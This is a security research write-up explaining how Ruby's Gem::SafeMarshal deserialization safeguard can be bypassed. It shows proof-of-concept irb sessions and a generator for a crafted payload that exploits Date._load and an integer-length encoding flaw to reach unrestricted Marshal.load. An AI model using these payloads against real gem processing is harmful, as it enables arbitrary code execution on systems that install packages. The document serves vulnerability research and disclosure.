In September 2023, Ruby added Gem::SafeMarshal in an attempt to make deserialization safer when processing packaged library (.gem) files. I decided to learn how it works and to take on the challenge of breaking it to execute arbitrary commands.
Gem::SafeMarshal can be loaded by requiring rubygems/safe_marshal or calling Gem.load_safe_marshal. Gem::SafeMarshal defines two methods, safe_load and load. With the load method you specify which classes, symbols and instance variables are permitted, whereas the safe_load method has a hardcoded list of what is permitted.
irb(main):001:0> Gem.load_safe_marshal
=> true
irb(main):002:0> class Foo; end
=> nil
irb(main):003:0> serialized_foo = Marshal.dump(Foo.new)
=> "\x04\bo:\bFoo\x00"
irb(main):004:0> Gem::SafeMarshal.safe_load(serialized_foo)
/usr/local/lib/ruby/3.4.0+0/rubygems/safe_marshal/visitors/to_ruby.rb:277:in 'Gem::SafeMarshal::Visitors::ToRuby#resolve_class': Attempting to load unpermitted class "Foo" @ root.object (Gem::SafeMarshal::Visitors::ToRuby::UnpermittedClassError)
irb(main):005:0> Gem::SafeMarshal.load(serialized_foo)
/usr/local/lib/ruby/3.4.0+0/rubygems/safe_marshal/visitors/to_ruby.rb:277:in 'Gem::SafeMarshal::Visitors::ToRuby#resolve_class': Attempting to load unpermitted class "Foo" @ root.object (Gem::SafeMarshal::Visitors::ToRuby::UnpermittedClassError)
irb(main):006:0> Gem::SafeMarshal.load(serialized_foo, permitted_classes: ["Foo"])
=> #<Foo:0x00007f149ec54a90>
It wasn't obvious to me how SafeMarshal could be implemented easily, since Marshal does not expose any means to restrict which classes can be deserialized. Java, by contrast, lets you override resolveClass in a subclass of java.io.ObjectInputStream. It turns out that it wasn't easy: SafeMarshal was achieved by creating a partial reimplementation of Marshal in pure Ruby.
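To give a feel for what reimplementing part of Marshal involves, here is a toy reader that pulls the class name out of a serialized stream before anything is instantiated. It is only a sketch under stated assumptions: peek_object_class, PeekDemo and PERMITTED are hypothetical names of mine, it is not how Gem::SafeMarshal is written, and it only understands a top-level plain object record with a short class name.

```ruby
# Hypothetical helper, not part of RubyGems: returns the class name of a
# top-level plain object record ("o"), or nil for any other record type.
def peek_object_class(data)
  bytes = data.b
  unless bytes.getbyte(0) == Marshal::MAJOR_VERSION &&
         bytes.getbyte(1) == Marshal::MINOR_VERSION
    raise ArgumentError, "unexpected Marshal version header"
  end

  # Type byte "o" (plain object) followed by ":" (a symbol holding the class name).
  return nil unless bytes[2] == "o" && bytes[3] == ":"

  # This sketch handles only the single-byte length form (lengths 1..122),
  # where the stored byte is the length plus 5.
  len_byte = bytes.getbyte(4)
  unless len_byte && len_byte.between?(6, 127)
    raise ArgumentError, "unsupported length encoding"
  end

  bytes[5, len_byte - 5]
end

class PeekDemo; end

PERMITTED = %w[Date Time].freeze # illustrative allow-list only
name = peek_object_class(Marshal.dump(PeekDemo.new))
puts "class: #{name}, permitted: #{PERMITTED.include?(name)}"
```

Checking only the outermost record is nowhere near enough, because nested objects carry their own class names. A real implementation has to walk the whole stream, which is why the work ends up resembling a second Marshal parser.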
The first thing I checked was whether the lists of what is permitted by Gem::SafeMarshal.safe_load are overly permissive. The lists can be found in lib/rubygems/safe_marshal.rb and are shown below:
module Gem
  module SafeMarshal
    PERMITTED_CLASSES = %w[
      Date
      Time
      Rational
      Gem::Dependency
      Gem::NameTuple
      Gem::Platform
      Gem::Requirement
      Gem::Specification
      Gem::Version
      Gem::Version::Requirement
      YAML::Syck::DefaultKey
      YAML::PrivateType
    ].freeze

    PERMITTED_SYMBOLS = %w[
      development
      runtime
      name
      number
      platform
      dependencies
    ].freeze

    PERMITTED_IVARS = {
      "String" => %w[E encoding @taguri @debug_created_info],
      "Time" => %w[
        offset zone nano_num nano_den submicro
        @_zone @marshal_with_utc_coercion
      ],
      "Gem::Dependency" => %w[
        @name @requirement @prerelease
        @version_requirement @version_requirements @type
        @force_ruby_platform
      ],
      "Gem::NameTuple" => %w[@name @version @platform],
      "Gem::Platform" => %w[@os @cpu @version],
      "Psych::PrivateType" => %w[@value @type_id],
    }.freeze
At first glance, the lists seemed appropriately limited and plausibly contained only essential items. Because the list of permitted classes was so short, I decided to work systematically through every class, starting at the top with the Date class.
I found that the Date class is implemented in C, in the file ext/date/date_core.c.
static VALUE cDate, cDateTime;

void Init_date_core(void)
{
    [...]
    cDate = rb_define_class("Date", rb_cObject);
    [...]
    rb_define_method(cDate, "marshal_dump", d_lite_marshal_dump, 0);
    rb_define_method(cDate, "marshal_load", d_lite_marshal_load, 1);
    rb_define_singleton_method(cDate, "_load", date_s__load, 1);
I started with the marshal_load method, as it is invoked during deserialization and is a common starting point for deserialization gadget chains. The marshal_load method was not too interesting: mostly data validation followed by stuffing values into an internal C struct. However, the next method, _load, which can also be invoked during deserialization, was much more interesting.
static VALUE
date_s__load(VALUE klass, VALUE s)
{
    VALUE a, obj;

    a = rb_marshal_load(s);
    obj = d_lite_s_alloc(klass);
    return d_lite_marshal_load(obj, a);
}
The _load method calls the C function rb_marshal_load, equivalent to Marshal.load in Ruby, with a value under our control. This means we can use a serialized Date object to obtain an arbitrary Marshal deserialization primitive. We can use this to move from Gem::SafeMarshal deserialization with restricted classes to Marshal deserialization with unrestricted classes. From Marshal, we can use a deserialization gadget chain to achieve arbitrary command execution.
irb(main):001> require "date"
=> true
irb(main):002> Gem.load_safe_marshal
=> true
irb(main):003* class Foo
irb(main):004*   def marshal_dump; end
irb(main):005*   def marshal_load(*)
irb(main):006*     abort "You win - Foo#marshal_load was called"
irb(main):007*   end
irb(main):008> end
=> :marshal_load
irb(main):009* class Date
irb(main):010*   undef_method :marshal_dump
irb(main):011*   def _dump(_depth)
irb(main):012*     Marshal.dump(Foo.new)
irb(main):013*   end
irb(main):014> end
=> :_dump
irb(main):015> Gem::SafeMarshal.safe_load(Marshal.dump(Date.new))
You win - Foo#marshal_load was called
Instead of auditing more permitted classes, I moved on to reading the source code of Gem::SafeMarshal. I came across some incredibly suspicious-looking code within the instance variable handling. The code builds a serialized string by concatenation, including attacker-controlled data. The serialized string is then passed to the real Marshal.load.
def visit_Gem_SafeMarshal_Elements_WithIvars(e)
  [...]
  marshal_string = "\x04\bIu:\tTime".b
  marshal_string.concat(s.size + 5)
  marshal_string << s
  marshal_string.concat(internal.size + 5)

  internal.each do |k, v|
    marshal_string.concat(":")
    marshal_string.concat(k.size + 5)
    marshal_string.concat(k.to_s)
    dumped = Marshal.dump(v)
    dumped[0, 2] = ""
    marshal_string.concat(dumped)
  end

  object = @objects[object_offset] = Marshal.load(marshal_string)
  [...]
We control the value stored in the variable s in the visit_Gem_SafeMarshal_Elements_WithIvars code above. If we supply a string of size 0xf6, adding 5 gives 0xfb, which Marshal interprets as a length of 0. Our full s value is still concatenated after that length byte, so Marshal reads the contents of s as whatever comes next in the stream rather than as string data.
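The arithmetic can be checked in isolation. The snippet below is a small sketch of my own rather than code from RubyGems; the variable names are hypothetical, and it only reproduces the length-prefix step to show the byte that ends up in the stream and how Marshal reads it.

```ruby
s_size = 0xf6 # attacker-chosen size of s (246 bytes)

# Mirrors `marshal_string.concat(s.size + 5)`: on a binary string,
# String#concat with an Integer appends that single byte.
prefix = "".b
prefix.concat(s_size + 5)
puts prefix.inspect # the byte 0xfb

# Read back as a Marshal integer, that byte means 0 rather than 246.
decoded = Marshal.load("\x04\bi".b + prefix)
puts decoded

# For comparison, Marshal itself needs two bytes to encode 246.
genuine = Marshal.dump(s_size)[3..-1]
puts genuine.inspect
```

The "add 5" shortcut is only valid for small values, which is the gap the 0xf6-byte string falls into.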
This works because the Marshal format has several single-byte encodings of the integer 0, as shown below, and Gem::SafeMarshal does not account for this.
irb(main):001:0> Marshal.dump(0)
=> "\x04\bi\x00"
irb(main):002:0> Marshal.load("\x04\bi\x00")
=> 0
irb(main):003:0> Marshal.load("\x04\bi\x05")
=> 0
irb(main):004:0> Marshal.load("\x04\bi\xfb")
=> 0
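The three encodings of 0 fall out of how a single length byte is interpreted. Below is a pure-Ruby sketch of that rule as I understand it from the integer reader in Ruby's marshal.c. The method name decode_single_byte_long is hypothetical, and the multi-byte forms are deliberately left out.

```ruby
# Sketch of Marshal's single-byte integer rule (multi-byte forms omitted).
def decode_single_byte_long(byte)
  c = byte > 127 ? byte - 256 : byte # reinterpret as a signed 8-bit value
  return 0 if c.zero?                # 0x00 is zero
  return c - 5 if c > 4              # 0x05..0x7f map to 0..122
  return c + 5 if c < -4             # 0x80..0xfb map to -123..0
  nil                                # 0x01..0x04 and 0xfc..0xff start multi-byte integers
end

[0x00, 0x05, 0xfb].each do |byte|
  puts format("0x%02x decodes to %d", byte, decode_single_byte_long(byte))
end
```

The positive branch offsets by 5 and the negative branch offsets by 5 in the other direction, so both 0x05 and 0xfb land on 0 alongside the literal 0x00.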
Now we have to work out what Marshal is expecting at this point, how to craft it, and hope it has an impact on security.
It turns out Marshal is in a state where it is ready to receive instance variables. First it needs to know how many instance variables to expect (I chose 1), then a name (I chose :zone), then a value. The value can be an arbitrary serialized object, thereby achieving deserialization with unrestricted classes once again. Here we can use a deserialization gadget chain to achieve arbitrary command execution (just be careful of the 240 or so byte limit).
irb(main):001* class Foo
irb(main):002*   def marshal_load(*)
irb(main):003*     abort "You win - Foo#marshal_load was called"
irb(main):004*   end
irb(main):005> end
=> :marshal_load
irb(main):006> Gem.load_safe_marshal
=> true
irb(main):007* Gem::SafeMarshal.safe_load(
irb(main):008*   "\x04\bIu:\tTime\x01\xF6\x06:\tzoneU:\bFoo0" + ("\x00" * 233)
irb(main):009> )
You win - Foo#marshal_load was called
The payload was generated using the following code:
class Foo
  def marshal_dump
  end
end

payload = "#{Marshal::MAJOR_VERSION.chr}#{Marshal::MINOR_VERSION.chr}" +
  "I" + # TYPE_IVAR
  "u" + # TYPE_USERDEF
  Marshal.dump(:Time)[2..-1] +
  Marshal.dump(0xfb - 5)[3..-1] +
  Marshal.dump(1)[3..-1] +
  Marshal.dump(:zone)[2..-1] +
  Marshal.dump(Foo.new)[2..-1] +
  ("\x00" * 233)

puts payload.inspect
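The figure of 233 trailing bytes can be sanity-checked by counting bytes. The sketch below is my own accounting, not part of the original exploit, and its variable names are hypothetical. It assumes the same choices as above (one instance variable named :zone, and a Foo whose marshal_dump returns nil). It also assumes, as I read the format, that the outer TYPE_IVAR record expects one more byte after s for its own instance-variable count.

```ruby
class Foo
  def marshal_dump; end # serializes as nil, as in the generator above
end

count = Marshal.dump(1)[3..-1]       # instance variable count
name  = Marshal.dump(:zone)[2..-1]   # instance variable name
value = Marshal.dump(Foo.new)[2..-1] # the injected object

declared_len = 0xfb - 5 # size of s, chosen so that size + 5 is 0xfb
injected = count + name + value
padding = declared_len - injected.bytesize
room_for_value = declared_len - count.bytesize - name.bytesize

puts "injected bytes:            #{injected.bytesize}"
puts "padding needed inside s:   #{padding}"
puts "bytes left over after s:   #{233 - padding}"
puts "room for serialized value: #{room_for_value}"
```

Under these assumptions the padding inside s comes to 232 bytes and the serialized value has 239 bytes to work with, which matches the "240 or so" limit mentioned earlier. A longer instance variable name would shrink that budget further.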